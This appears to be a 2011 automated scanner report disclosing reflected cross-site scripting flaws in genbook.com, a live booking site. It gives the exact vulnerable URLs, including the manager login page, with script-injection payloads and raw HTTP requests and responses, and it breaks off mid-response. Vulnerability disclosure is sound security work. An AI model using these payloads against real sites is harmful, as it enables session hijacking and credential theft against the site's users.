XSS, Cross Site Scripting in genbook.com, CWE-79, CAPEC-86, DORK REPORT SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Netsparker - Scan Report Summary

TARGET URL: http://www.genbook.com/bookings/booknowjstag....
SCAN DATE: 4/25/2011 7:58:57 PM
REPORT DATE: 4/25/2011 8:07:53 PM
SCAN DURATION: 00:03:53
TOTAL REQUESTS: 6268
AVERAGE SPEED: 26.80 req/sec.

15 identified, 11 confirmed, 0 critical, 4 informational

GHDB, DORK Tests

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Severity distribution: IMPORTANT 53 %, MEDIUM 7 %, LOW 13 %, INFORMATION 27 %

VULNERABILITY SUMMARY

URL | Parameter | Method | Vulnerability | Confirmed
/about-genbook/press-releases/genbook-customer-reviews-now-published-to-google-places.html | | | E-mail Address Disclosure | No
/bookings/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/bookings/booknowjstag.action | bookingSourceId | GET | [Possible] Cross-site Scripting | No
 | | | Cookie Not Marked As HttpOnly | Yes
/bookings/images/ | | | Apache Version Disclosure | No
 | | | Forbidden Resource | Yes
/bookings/slot/reservation/30010843 | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/bookings/slot/reservation/30010918 | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/bookings/slot/reservation/30010944 | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/bookings/slot/reservation/30012013 | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/manager/ | | | Cookie Not Marked As Secure | Yes
/manager/forgotpassword | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/manager/login | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/robots.txt | | | Robots.txt Identified | Yes
/sitemap.xml | | | Sitemap Identified | No

Cross-site Scripting

7 TOTAL, severity IMPORTANT, 7 CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several attack opportunities, most commonly hijacking the current user's session or altering the page's HTML on the fly to steal the user's credentials. It happens because input supplied by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application rather than the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to its format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is delivered to the user's browser.

Before sanitizing user input, define a list of the characters that are expected and acceptable and use it to populate a white-list. This list needs to be defined only once and should then be used to sanitize and validate all subsequent input.

A number of pre-defined, well-structured white-list libraries are available for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting library are good examples.

/bookings/ CONFIRMED

http://www.genbook.com/bookings/?'"--></style></script><script>alert(0x000029)</script>

Parameters

Parameter | Type | Value
Query Based | QUERYSTRING | '"--></style></script><script>alert(0x000029)</script>

Request

GET /bookings/?'"--></style></script><script>netsparker(0x000029)</script> HTTP/1.1
Referer: http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1)//7010dea1bfa
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=jjz2adntav7r.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:59:59 GMT
Server: Jetty(6.1.21)
Content-Type: text/html; charset=iso-8859-1
Cache-Control: no-cache
Pragma: no-cache
Expires: Sun, 01 Dec 1974 00:00:00 GMT
X-UA-Compatible: IE=7
Transfer-Encoding: chunked


<html><head><meta http-equiv="REFRESH" content="0; url=https://www.genbook.com/bookings/?'"--></style></script><script>netsparker(0x000029)</script>"/></head><body></body></html>
/manager/forgotpassword CONFIRMED

http://www.genbook.com/manager/forgotpassword?'"--></style></script><script>alert(0x00035C)</script>

Parameters

Parameter | Type | Value
Query Based | QUERYSTRING | '"--></style></script><script>alert(0x00035C)</script>

Request

GET /manager/forgotpassword?'"--></style></script><script>netsparker(0x00035C)</script> HTTP/1.1
Referer: http://www.genbook.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: JSESSIONID=o1c1z4gqu1o3.bm2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:00:19 GMT
Server: Jetty(6.1.21)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 191
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 01:00:19 GMT
X-UA-Compatible: IE=7


<html><head><meta http-equiv="REFRESH" content="0; url=https://www.genbook.com/manager/forgotpassword?'"--></style></script><script>netsparker(0x00035C)</script>"/></head><body></body></html>
/manager/login CONFIRMED

http://www.genbook.com/manager/login?'"--></style></script><script>alert(0x000476)</script>

Parameters

Parameter | Type | Value
os_cookie | POST | true
os_destination | POST |
os_password | POST |
os_username | POST |
Query Based | QUERYSTRING | '"--></style></script><script>alert(0x000476)</script>

Request

POST /manager/login?'"--></style></script><script>netsparker(0x000476)</script> HTTP/1.1
Referer: http://www.genbook.com/how-it-works/who-uses-genbook/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.genbook.com
Cookie: JSESSIONID=1o46gucz5aha3.bm2
Content-Length: 57
Accept-Encoding: gzip, deflate

os_cookie=true&os_destination=&os_password=&os_username=&

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:00:52 GMT
Server: Jetty(6.1.21)
Content-Type: text/html; charset=iso-8859-1
Content-Length: 182
Cache-Control: max-age=0
Expires: Tue, 26 Apr 2011 01:00:52 GMT
X-UA-Compatible: IE=7


<html><head><meta http-equiv="REFRESH" content="0; url=https://www.genbook.com/manager/login?'"--></style></script><script>netsparker(0x000476)</script>"/></head><body></body></html>
/bookings/slot/reservation/30010944 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30010944?'"--></style></script><script>alert(0x0007..

Parameters

Parameter | Type | Value
Query Based | QUERYSTRING | '"--></style></script><script>alert(0x000776)</script>

Request

GET /bookings/slot/reservation/30010944?'"--></style></script><script>netsparker(0x000776)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997986; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: CUSTOMER_COOKIE=194997987
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with Spa Evia in Everett, Washington</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =false;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with Spa Evia in Everett, Washington

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<img src="serviceprovider/30010944/logo" alt="Logo" width="128" height="78"/>
<h1 id="businessname">Spa Evia</h1>
<div id="businessaddress">8413 Xavier Way, Everett, WA 98012</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30010944?'"--></style></script><script>netsparker(0x000776)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30010944/reviews?'"--></style></script><script>netsparker(0x000776)</script>">Reviews (13)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Booking</div></div></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850255">Eyelash Extensions</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=989881">Customized Care</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850122">Facials</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=849918">Facial Waxing</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850166">Body Waxing</a></li>
<li><a href="slot/reservation/30010944?bookingContactId=194997987&category=850261">Add-on/ Extra's</a></li>
</ul>
</dd>
</dl>
<div id="services">

<a name="990015" class="servicecategory">Booking</a>
<dl>
<dt>
<a href="slot/reservation/30010944/990038?bookingContactId=194997987">When Booking</a>
</dt>
<dd>If you need more than once service. Write me a memo to add other services to your appointment. Make sure to click confirm, to finish booking your online appointment. Thanks!</dd>
<dt>
<a href="slot/reservation/30010944/39255402?bookingContactId=194997987">Contact Me</a>
</dt>
<dd>You can schedule several ways. Online booking, Email (hellen@spaevia.com), text me, or by phone. :) </dd>
</dl>
</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=47.845802307128906,-122.18824768066406(Spa Evia)&ll=47.845802307128906,-122.18824768066406&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">Spa Evia</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">8413 Xavier Way</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">Everett</span>, <span class="region" itemprop="region">WA</span> <span class="postal-code" itemprop="postal-code">98012</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://www.spaevia.net" target="_blank">http://www.spaevia.net</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>5:30pm - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>5:30pm - 7:00pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>5:30pm - 7:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>9:00am - 2:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >

</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">Spa Evia</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">8413 Xavier Way</span>,&nbsp;
<span class="locality" itemprop="locality">Everett</span>,&nbsp;
<span class="region" itemprop="region">WA</span>&nbsp;
<span class="postal-code" itemprop="postal-code">98012</span>,
</span>
<a class="url" itemprop="url" href="http://www.spaevia.net" target="_blank">http://www.spaevia.net</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="reviewer vcard"><span class="fn" itemprop="reviewer">Beth E</span></span>, <span class="dtreviewed" title="2011-01-23" itemprop="dtreviewed" datetime="2011-01-23">Jan 23, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">Hellen does a fabulous job taming my unruly eyebrows. She creates a relaxed atmosphere, is so efficient, and makes me feel at ease with her pleasant manner. I heartily recommend Hellen's services!</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30010944/reviews?'"--></style></script><script>netsparker(0x000776)</script>">Read all 13 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30010944");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30010944");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;
latLong=new GLatLng(47.845802307128906,-122.18824768066406);

window.setTimeout('setAddressDiv("8413 Xavier Way, Everett, WA 98012", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>


<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>

<script>
COMSCORE.beacon({
c1:2,
c2:7517143,
c3:"",
c4:"",
c5:"",
c6:"",
c15:""
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7517143&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
<!-- End comScore Tag -->
</body>
</html>
/bookings/slot/reservation/30010918 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30010918?'"--></style></script><script>alert(0x0007..

Parameters

Parameter | Type | Value
Query Based | QUERYSTRING | '"--></style></script><script>alert(0x00077B)</script>

Request

GET /bookings/slot/reservation/30010918?'"--></style></script><script>netsparker(0x00077B)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997986; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: CUSTOMER_COOKIE=194997989
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with New Beginnings Skin Care &amp; Massage in Carson City, Nevada</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =false;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
<div style="width:856px; margin: 0 auto; margin-top:3px;">
<div style="float:right;"><img src="images/CB_fullpage_footer.gif"/></div>

Schedule an appointment online with New Beginnings Skin Care & Massage in Carson City, Nevada

</div>
</div>
<div id="header_bg2">
<div id="header">
<div id="counterHolder">
<div class="detached">
<img src="images/counter_corner.gif" id="counterImage"/>
<div id="counterGrey"><div id="counterText">Slot will be held for <span id="minsremaining"></span></div></div>
</div>
</div>
<h1 id="businessname">New Beginnings Skin Care &amp; Massage</h1>
<div id="businessaddress">343 Fairview Drive #205, Carson City, NV 89701</div>

</div>
</div>


<div class="tabSection">
<div class="spacingDiv" style="width:12px;"></div>
<div class="tabDiv tabDivSelected"><a href="slot/reservation/30010918?'"--></style></script><script>netsparker(0x00077B)</script>">Make an Appointment</a></div>
<div class="spacingDiv" style="width:6px;"></div>
<div class="tabDiv"><a href="http://www.genbook.com/bookings/slot/reservation/30010918/reviews?'"--></style></script><script>netsparker(0x00077B)</script>">Reviews (36)</a></div>
<div class="spacingDiv" style="width:auto;float:none;">&nbsp;</div>
</div>
<div style="clear:both;margin-bottom:13px;"></div>
<div id="bookingbody">

<table class="mainTable" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="mainTableC1">


<div style="border-bottom:1px solid #DBDBDB;padding-bottom:20px; width:500px;" id="breadcrumbDiv">
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="breadCrumbC2">
<img src="images/CB_fullpage_breadcrumbs1.gif" usemap="#breadCrumbs" border="0"/>
</td>
</tr>
</table>
</div>

<map name="breadCrumbs" id="breadCrumbs">


</map>


<h2>Select a service to schedule an appointment</h2>
<dl id="servicecategories">
<dt>Service Category</dt>
<dd>
<ul>
<li><div class="category_selected"><div class="test">Spa Packages</div></div></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=835671">Facials</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=117800859">Image Skin Peels</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=116953788">Microdermabrasion</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=835686">Massage Therapy</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=835715">Body Sugaring</a></li>
<li><a href="slot/reservation/30010918?bookingContactId=194997989&category=1588936">Body Treatments</a></li>
</ul>
</dd>
</dl>
<div id="services">


<a name="859802" class="servicecategory">Spa Packages</a>
<dl>
<dt>
<a href="slot/reservation/30010918/1576487?bookingContactId=194997989">Refresh Spa - $130.00</a>
</dt>
<dd>1 Hour Massage
1 Hour Signature European Facial
Eye Brow Sugaring
</dd>



<dt>
<a href="slot/reservation/30010918/2296746?bookingContactId=194997989">Begin Spa - $135.00</a>
</dt>
<dd>Quickly becoming everyones favorite! Combining New Beginnings Facial Journey, New Beginnings Bare Foot Ritual, and Eyebrow Sugaring</dd>
<dt>
<a href="slot/reservation/30010918/119143082?bookingContactId=194997989">Rejuvenate - $130.00</a>
</dt>
<dd>Back Treatment (facial for the back with mud mask), and choose between Earth or Water Foot Ritual and eyebrow sugaring. (please note in comments which foot ritual you would like)</dd>
</dl>
</div>


</td>
<td class="mainTableC2">
<img style="padding-bottom:15px;" src="images/map_details.gif">

<div id="googleMapsDiv" class="googleMapDivDefault"></div>
<map name="googleInnacurateMap">
<area shape="rect" coords="227,10,300,23" href="http://maps.google.com/maps?q=39.14991760253906,-119.76551818847656(New Beginnings Skin Care & Massage)&ll=39.14991760253906,-119.76551818847656&z=13" target="_blank" />
</map>
<div class="googleMapDivInnacurate" id="googleMapDivInnacurate"><img src="images/unabletofind.gif" width="318" height="29" border="0" usemap="#googleInnacurateMap" /></div>
<br/>

<div class="vcard" itemscope itemtype="http://data-vocabulary.org/Organization">
<div><strong class="fn org" itemprop="name">New Beginnings Skin Care &amp; Massage</strong></div>
<div class="adr" itemscope itemprop="address">
<div class="bizaddress"><span class="street-address" itemprop="street-address">343 Fairview Drive #205</span></div>
<div class="bizaddress"><span class="locality" itemprop="locality">Carson City</span>, <span class="region" itemprop="region">NV</span> <span class="postal-code" itemprop="postal-code">89701</span></div>
</div>
<div class="bizaddress">
<a class="url" itemprop="url" href="http://www.newbeginningsskincare.com" target="_blank">http://www.newbeginningsskincare.com</a>
</div>
</div>
<a href="#" onclick="showMoreDetails(); return false;" style="font-size:11px;">more details</a>
<div>
<div id="businessClosed" style="display:none;">
<br/>
<div id="businessHours" >
<div>
<strong>Business Hours</strong>
</div>
<div class="bizhour">
<div class="dayname">Mon</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Tue</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Wed</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Thu</div>
<div>10:00am - 6:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Fri</div>
<div>9:00am - 5:30pm</div>
</div>
<div class="bizhour">
<div class="dayname">Sat</div>
<div>9:00am - 3:00pm</div>
</div>
</div>

<br/>
<div id="closedDays" >

</div>

</div>
<br/>
<div class="hreview review latestreview" itemscope itemtype="http://data-vocabulary.org/Review">
<div class="item vcard offscreen" itemprop="itemreviewed" itemscope itemtype="http://data-vocabulary.org/Organization">
<div class="fn org" itemprop="name">New Beginnings Skin Care &amp; Massage</div>
<span class="adr" itemprop="address" itemscope itemtype="http://data-vocabulary.org/Address">
<span class="street-address" itemprop="street-address">343 Fairview Drive #205</span>,&nbsp;
<span class="locality" itemprop="locality">Carson City</span>,&nbsp;
<span class="region" itemprop="region">NV</span>&nbsp;
<span class="postal-code" itemprop="postal-code">89701</span>,
</span>
<a class="url" itemprop="url" href="http://www.newbeginningsskincare.com" target="_blank">http://www.newbeginningsskincare.com</a>
</div>
<img src="images/latest_review.gif" alt="Latest review" />
<div class="summaryrating">
<div class="summary"><span class="reviewer vcard"><span class="fn" itemprop="reviewer">Jamie Castle </span></span>, <span class="dtreviewed" title="2011-04-13" itemprop="dtreviewed" datetime="2011-04-13">Apr 13, 2011</span></div>
<div class="rating"><span class="rating blend" itemprop="rating">5</span> <img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
<img src="images/reviews_star_on.gif" />
</div>
</div>
<div class="description" itemprop="description">Tami is great at everything. She is very knowledgeable about her products and services. She is very comfortable to be around and has great bedside manner.
I also love that I can book online!</div>
<div class="allreviews"><a href="http://www.genbook.com/bookings/slot/reservation/30010918/reviews?'"--></style></script><script>netsparker(0x00077B)</script>">Read all 36 reviews</a></div>
</div>
</div>


</td>
</tr>
</table>
</div>
<br/>

<div id="footer_full">

<div id="footerlogo">
<a href="http://www.genbook.com/" target="_blank"><img style="margin-bottom:0px; margin-right:7px;" src="images/genbook_mediumlogo.gif"/></a>
Hassle-Free <a href="http://www.genbook.com/" target="_blank">online appointment scheduling</a> for your small business
</div>

<div class="footer_indv fineprint">Copyright &copy; Genbook, Inc. <a href="/bookings/privacypolicy.action" onclick="window.open('/bookings/privacypolicy.action','');return false;">Privacy Policy</a> | <a href="/bookings/termsconditions.action" onclick="window.open('/bookings/termsconditions.action','');return false;">Terms &amp; Conditions</a> | <a href="http://twitter.com/genbookteam" target="_blank"><img src="images/twittericon.gif"/> Follow us</a> | <a href="http://facebook.com/genbook" target="_blank"><img src="images/facebookicon.gif"/> Like</a> |&nbsp;&nbsp;<a href="http://www.genbook.com" target="_blank" class="normal_link">www.genbook.com</a></div>

</div>




<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-3";
urchinTracker("/booking/select-service/30010918");
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
_udn="none";
_ulink=1;
_uacct = "UA-1818709-8";
urchinTracker("/booking/bookingpage/30010918");
</script>

<script type="text/javascript">
<!--
var latLong=null;
var zoom=13;
latLong=new GLatLng(39.14991760253906,-119.76551818847656);

window.setTimeout('setAddressDiv("343 Fairview Drive #205, Carson City, NV 89701", document.getElementById("googleMapsDiv"),false,latLong,zoom)',0);
//-->
</script>


<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>

<script>
COMSCORE.beacon({
c1:2,
c2:7517143,
c3:"",
c4:"",
c5:"",
c6:"",
c15:""
});
</script>
..
/bookings/slot/reservation/30012013 CONFIRMED

http://www.genbook.com/bookings/slot/reservation/30012013?'"--></style></script><script>alert(0x0007..

Parameters

Parameter | Type | Value
Query Based | QUERYSTRING | '"--></style></script><script>alert(0x00078C)</script>

Request

GET /bookings/slot/reservation/30012013?'"--></style></script><script>netsparker(0x00078C)</script> HTTP/1.1
Referer: http://www.genbook.com/sitemap.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.genbook.com
Cookie: CUSTOMER_COOKIE=194997995; JSESSIONID=17rrm2ulow3xp.cb1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:08 GMT
Server: Jetty(6.1.21)
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: CUSTOMER_COOKIE=194997996
X-UA-Compatible: IE=7
Transfer-Encoding: chunked



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<base href="http://www.genbook.com/bookings/" />
<title>Schedule an online appointment with Cloud Nine in oakland, California</title>
<link rel="stylesheet" type="text/css" href="style/booking_full.css" />
<script type="text/javascript">
//<![CDATA[
var CREDIT_CARD_ENABLED =true;
if (CREDIT_CARD_ENABLED) {
var COUNTDOWN_TIME = 600000;
} else {
var COUNTDOWN_TIME = 300000;
}
//]]>
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=3&amp;key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw" type="text/javascript"></script>
<script type="text/javascript" src="script/googlemaps.js"></script>


<script type="text/javascript">
//<![CDATA[
function showMoreDetails() {
var oElement = document.getElementById("businessClosed");
if (oElement.style.display == "none") {
oElement.style.display = "block";
} else {
oElement.style.display = "none";
}
}
//]]>
</script>
</head>
<body onload="javascript:initializeGoogleMaps();">
<div id="header_bg">
